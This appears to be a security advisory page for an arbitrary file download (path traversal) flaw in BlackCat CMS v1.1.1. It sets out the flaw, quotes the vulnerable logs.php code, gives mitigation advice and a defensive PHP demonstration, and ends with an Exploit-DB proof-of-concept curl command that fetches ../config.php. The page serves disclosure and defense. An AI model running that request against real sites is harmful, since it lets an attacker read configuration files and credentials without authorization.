Vendor: BlackCat CMS
By: N/A
CVSS: 7.5 (HIGH)
Vulnerability Type: Arbitrary File Download
CWE: 434
Product Name: BlackCat CMS
Affected Version From: v1.1.1
Affected Version To: v1.1.1
Patch Exists: NO
Related CWE: N/A
CPE: a:blackcat-cms:blackcat_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Centos 6.5, PHP 5.4.41
Date: 2015/06/16

BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability

BlackCat CMS v1.1.1 is vulnerable to arbitrary file download through the dl GET parameter of modules/blackcat/widgets/logs.php. The parameter value is appended to CAT_PATH/temp/ and passed through CAT_Helper_Directory::sanitizePath(), which normalises the string but does not confine the result to the temp directory, so a value such as ../config.php resolves to a file outside it (a classic path traversal). The handler then packs the target into a zip archive and streams it with readfile(), so a remote attacker who can reach the widget can read any file the web server process can open, such as the CMS config.php.

Two points worth noting from the code excerpt below. First, the excerpt starts at line 72, so any access check earlier in the file is not shown; the PoC simply requests the widget directly. Second, the zip is created in the directory of the requested file (pathinfo($file, PATHINFO_DIRNAME) . '/' . name . '.zip'), not in temp/, and is left on disk after the download. Exploitation therefore requires that directory to be writable by the web server, and it leaves a .zip copy of the target beside the original, which is both a forensic indicator and, where the directory is web-reachable, a second way to fetch the file.

Mitigation:

Treat the dl value as a bare file name: reject anything containing a path separator, a NUL byte or a leading dot, resolve the joined path with realpath(), and verify that the canonical result starts with the canonical temp directory (separator included) before calling file_exists() or readfile(). Normalising the string, as sanitizePath() does, is not confinement. Write the generated zip into temp/ (or stream it without touching disk) rather than beside the source file, and remove it after the download. Restrict the widget to authenticated administrators if it is not already.
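As an added example (not code from BlackCat CMS or from the Exploit-DB entry), the following PHP script places the unconfined join used by logs.php beside a confined resolver and exercises both against a throwaway directory. The stand-in for CAT_Helper_Directory::sanitizePath() only collapses repeated slashes, which is an assumption about that helper; the directory layout and file contents are constructed for the demonstration.

```php
<?php
// Added example, not BlackCat CMS code: the unconfined join from logs.php
// next to a confined replacement, exercised against a throwaway directory.
// sanitizePath() is stood in by a stub that only collapses repeated slashes;
// that behaviour is an assumption about the real helper.

// Vulnerable pattern: the request value is appended to the base path and
// the string is tidied, but nothing anchors the result under $tempDir.
function vulnerable_path(string $tempDir, string $dl): string
{
    return preg_replace('#/+#', '/', $tempDir . '/' . $dl);
}

// Hardened resolver: allow only a bare file name, canonicalise with
// realpath() (which also follows symlinks planted in temp/), and check
// that the canonical result still sits inside the canonical base.
function confined_path(string $tempDir, string $dl): ?string
{
    $base = realpath($tempDir);
    if ($base === false) {
        return null;
    }
    // Bare name, no leading dot: rules out "..", dotfiles, separators and
    // NUL bytes before any filesystem call is made.
    if (!preg_match('/^[A-Za-z0-9_-][A-Za-z0-9._-]*$/', $dl)) {
        return null;
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $dl);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Compare with the separator included so /x/temp2 is not accepted for /x/temp.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed layout: <root>/config.php (sensitive) and <root>/temp/app.log (legitimate).
$root = sys_get_temp_dir() . '/bcdemo_' . bin2hex(random_bytes(4));
mkdir($root . '/temp', 0700, true);
file_put_contents($root . '/config.php', "<?php \$db_password = 'secret';\n");
file_put_contents($root . '/temp/app.log', "2015-06-16 widget loaded\n");

foreach (['app.log', '../config.php', 'missing.log'] as $dl) {
    $vuln = vulnerable_path($root . '/temp', $dl);
    $safe = confined_path($root . '/temp', $dl);
    printf("dl=%-15s vulnerable: %-9s confined: %s\n",
        $dl,
        file_exists($vuln) ? 'served' : 'not found',
        $safe === null ? 'rejected' : 'served ' . basename($safe));
}

// Remove the throwaway files.
unlink($root . '/temp/app.log');
unlink($root . '/config.php');
rmdir($root . '/temp');
rmdir($root);
```

Run it with the php CLI. app.log resolves under both functions; ../config.php passes the file_exists() check that logs.php relies on under the vulnerable join but is rejected by confined_path(); a name that does not exist is rejected. The allowlist regex is deliberately stricter than realpath() alone would require: realpath() and the prefix comparison do the actual confinement, while the pattern makes the intent explicit and keeps absolute paths and dotfiles out before the filesystem is touched.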
Source

Exploit-DB raw data:

# Exploit Title: BlackCat CMS v1.1.1 Arbitrary File Download Vulnerability 
# Date: 2015/06/16
# Vendor Homepage: http://blackcat-cms.org/
# Software Link: http://blackcat-cms.org/temp/packetyzer/blackcatcms_2fo3PXdKj1.zip
# Version: v1.1.1
# Tested on: Centos 6.5,PHP 5.4.41
# Category: webapps

* Description

file: /modules/blackcat/widgets/logs.php (lines 72-100)

// download
if(CAT_Helper_Validate::sanitizeGet('dl'))
{
    // Not taint checked: the raw 'dl' value is appended to CAT_PATH/temp/ and
    // only normalised by sanitizePath(), never confined to that directory,
    // so '../' sequences walk out of temp/.
    $file = CAT_Helper_Directory::sanitizePath(CAT_PATH.'/temp/'.CAT_Helper_Validate::sanitizeGet('dl'));
    if(file_exists($file))
    {
        // The zip is created in the directory of the requested file, not in
        // temp/, and is left there after the download.
        $zip = CAT_Helper_Zip::getInstance(pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip');
        $zip->config('removePath',pathinfo($file,PATHINFO_DIRNAME))
            ->create(array($file));
        // Parses as (!$zip->errorCode()) == 0, which happens to select the
        // intended branch: true only when errorCode() is non-zero.
        if(!$zip->errorCode() == 0)
        {
            echo CAT_Helper_Validate::getInstance()->lang()->translate("Unable to pack the file")
                . ": ".str_ireplace( array( str_replace('\\','/',CAT_PATH),'\\'), array('/abs/path/to','/'), $file );
        }
        else
        {
            // The archive containing the requested file is streamed to the client.
            $filename = pathinfo($file,PATHINFO_DIRNAME).'/'.pathinfo($file,PATHINFO_FILENAME).'.zip';
            header("Pragma: public"); // required
            header("Expires: 0");
            header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
            header("Cache-Control: private",false); // required for certain browsers
            header("Content-Type: application/zip");
            header("Content-Disposition: attachment; filename=\"".basename($filename)."\";" );
            header("Content-Transfer-Encoding: binary");
            header("Content-Length: ".filesize($filename));
            readfile("$filename");
            exit;
        }
    }
} // closes if(sanitizeGet('dl'))


POC:
# 10.1.1.1 is the placeholder target. The response body is a zip archive
# holding the requested file; gunzip unpacks a single-member zip (use unzip
# if it does not). Side effect on the target: config.zip is left in the CMS
# root next to config.php.
curl -sH 'Accept-encoding: gzip' "http://10.1.1.1/blackcat/modules/blackcat/widgets/logs.php?dl=../config.php" |gunzip -